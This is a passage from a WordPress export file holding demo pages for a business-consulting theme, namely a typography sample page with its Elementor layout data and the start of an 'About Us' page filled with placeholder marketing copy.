							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Customer Experience
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										New Business Innovation
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Sales and Marketing
									</li>
						</ul>
			<h4>Blockquote</h4>		
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>471</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 04:22:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 04:22:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[typography]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[473]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8a5d04c","elType":"section","settings":{"padding":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"dc1cfdf","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3925b8d","elType":"widget","settings":{"title":"Heading 1","header_size":"h1","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9cdb2cf","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7594742","elType":"widget","settings":{"title":"Heading 2","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4f04e2d","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"552d935","elType":"widget","settings":{"title":"Heading 3","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"eb0c1c1","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7a7b273","elType":"widget","settings":{"title":"Heading 4","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3cce58e","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3d16c16","elType":"widget","settings":{"title":"Heading 5","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1782a00","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"22515c1","elType":"widget","settings":{"title":"Heading 6","header_size":"h6","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"aa2835e","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0e2eb3b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"4555825","elType":"widget","settings":{"title":"IV Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e1bd3b8","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7359c5a","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"f199e08","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6eacc12","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"bc73054","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2b7bef0","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"8e362cb","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"9b85fb3","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"52ae6c7","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"aedecf5","elType":"widget","settings":{"title":"III Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0aaf919","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"c3e0f34","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"67b4e55","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b8d273a","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8de19bc","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"097ada7","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"34bf2f6","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"a92b63b","elType":"widget","settings":{"title":"II Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a598d52","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"40c0145","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"50ffc56","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"69df804","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"415941f","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"010c8ae","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"093badb","elType":"widget","settings":{"title":"Text Elements","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"127fad1","elType":"widget","settings":{"editor":"<p>Three of these curves describe an initial Covid-related spike in demand, and three describe a short-term hit. Where each group begins to diverge, however, is in what\u2019s likely to <span style=\"color: #4b83fc;\">happen to demand over the next several years.<\/span> Think, for example, of <span style=\"color: #4b83fc; font-weight: 600;\">personal computer monitors or other types<\/span> of goods that were declining pre-pandemic and fall into the \u201cshort-term spike, long-term decline\u201d archetype. The story is different for online grocery shopping and collaboration services like Zoom (short-term spike, long-term growth), both of which were growing steadily before the pandemic. <em>Experimentation during the crisis has convinced more and more customers that ordering or meeting online makes sense, pulling forward demand that will likely stick<\/em>.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ad421e7","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"4ca1f31","elType":"widget","settings":{"title":"Highlights","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5249e8e","elType":"widget","settings":{"editor":"<p><span style=\"background: #4b83fc; color: #fff;\">Most firms have set up a war room to triage<\/span> their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"c9dd334","elType":"widget","settings":{"editor":"<p><span style=\"background: #262832; color: #fff;\">Most firms have set up a war room to triage<\/span> their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ff8b1b8","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"006991d","elType":"widget","settings":{"title":"Dropcaps","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e9b8646","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e41f15a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"82d3b4a","elType":"widget","settings":{"editor":"<p><span class=\"drop-cap\" style=\"background: #4b83fc;\"><span class=\"drop-cap-letter\">M<\/span><\/span>ost firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"ab0df6a","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"336d7e3","elType":"widget","settings":{"editor":"<p><span class=\"drop-cap\"><span class=\"drop-cap-letter\">M<\/span><\/span>ost firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"9c81ff3","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"55e9a19","elType":"widget","settings":{"title":"Listings","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"297dfb9","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"8d62022","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"b9ca8ad","elType":"widget","settings":{"editor":"<ol><li>Customer Experience<\/li><li>New Business Innovation<\/li><li>Sales and Marketing<\/li><\/ol>","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_weight":"400","typography_line_height":{"unit":"px","size":42,"sizes":[]},"__globals__":{"text_color":""}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7b081bc","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"0cf1b0f","elType":"widget","settings":{"editor":"<ul><li>Customer Experience<\/li><li>New Business Innovation<\/li><li>Sales and Marketing<\/li><\/ul>","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_weight":"400","typography_line_height":{"unit":"px","size":42,"sizes":[]},"__globals__":{"text_color":""}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6f037fd","elType":"column","settings":{"_column_size":25,"_inline_size":null,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"f728999","elType":"widget","settings":{"icon_list":[{"text":"Customer Experience","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"6733193"},{"text":"New Business Innovation","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"7a2cb9d"},{"text":"Sales and Marketing","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"51805a9"}],"space_between":{"unit":"px","size":12,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":11,"sizes":[]},"text_indent":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"6484bff","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"fff55a7","elType":"widget","settings":{"icon_list":[{"text":"Customer Experience","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"6733193"},{"text":"New Business Innovation","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"7a2cb9d"},{"text":"Sales and Marketing","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"51805a9"}],"space_between":{"unit":"px","size":12,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":11,"sizes":[]},"text_indent":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true},{"id":"99d54a9","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"c5b4eb2","elType":"widget","settings":{"title":"Blockquote","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0310507","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"40df4db","elType":"column","settings":{"_column_size":33,"_inline_size":20},"elements":[],"isInner":true},{"id":"8a5f517","elType":"column","settings":{"_column_size":33,"_inline_size":59.33200000000000073896444519050419330596923828125},"elements":[{"id":"c1a7fe1","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"768ca46","elType":"column","settings":{"_column_size":33,"_inline_size":20},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:7:"heading";a:3:{s:5:"count";i:14;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:14;s:11:"header_size";i:13;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:14;}}}}s:11:"text-editor";a:3:{s:5:"count";i:23;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:23;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:9;s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:2;s:21:"typography_typography";i:2;s:22:"typography_font_family";i:2;s:22:"typography_font_weight";i:2;s:22:"typography_line_height";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:2:{s:5:"color";i:6;s:3:"gap";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:6;s:15:"_padding_mobile";i:6;}}}}s:6:"column";a:3:{s:5:"count";i:19;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:19;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:6;s:6:"layout";i:6;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:2;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>About Us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:01:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=487</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="630" height="475" src="https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg 630w, https://maxbizz.s3.amazonaws.com/images/image1-about-us-300x226.jpg 300w" sizes="(max-width: 630px) 100vw, 630px" />											
	        about company	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.</p><hr /><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.</p>		
										<img width="203" height="52" src="https://maxbizz.s3.amazonaws.com/images/signature-home2.png" alt="" loading="lazy" />											
			<h6>Peter Adams</h6>		
		<p>co-founder of company</p>		
        	<h6>Trusted <br>Clients</h6>      				        
        	<h6>Finished <br>Projects</h6>      				        
        	<h6>Years of <br>Experience</h6>      				        
        	<h6>Visited<br>Conferences</h6>      				        
	        what we do	        <h3>Creating Your Startup Business</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg" alt="Accounting &amp; Finance"></a>					
						<h5><a href="#">Accounting & Finance</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg" alt="Management Skills"></a>					
						<h5><a href="#">Management Skills</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg" alt="Business Planning"></a>					
						<h5><a href="#">Business Planning</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
										<img width="516" height="625" src="https://maxbizz.s3.amazonaws.com/images/image2-about-us.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-about-us.png 516w, https://maxbizz.s3.amazonaws.com/images/image2-about-us-248x300.png 248w" sizes="(max-width: 516px) 100vw, 516px" />											
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
